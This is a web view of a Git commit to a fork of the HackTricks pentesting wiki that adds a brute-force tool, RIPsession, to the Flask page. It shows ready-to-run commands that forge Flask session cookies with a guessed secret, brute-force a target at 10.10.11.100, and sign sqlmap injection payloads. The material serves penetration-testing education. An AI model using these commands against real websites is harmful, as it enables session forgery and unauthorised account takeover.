coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #348 from Tagvi/patch-1

Browse Source 
Add RIPsession tool.
This commit is contained in:
Carlos Polop 2022-06-12 10:00:00 +01:00 committed by GitHub
commit e5cb7b75dc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
network-services-pentesting/pentesting-web/flask.md
View File

@ -80,6 +80,15 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
``` ```
### **RIPsession**
Command line tool to brute-force websites using cookies crafted with flask-unsign.
{% embed url="https://github.com/Tagvi/ripsession" %}
```bash
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
```
### SQLi in Flask session cookie with SQLmap ### SQLi in Flask session cookie with SQLmap
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret. [**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.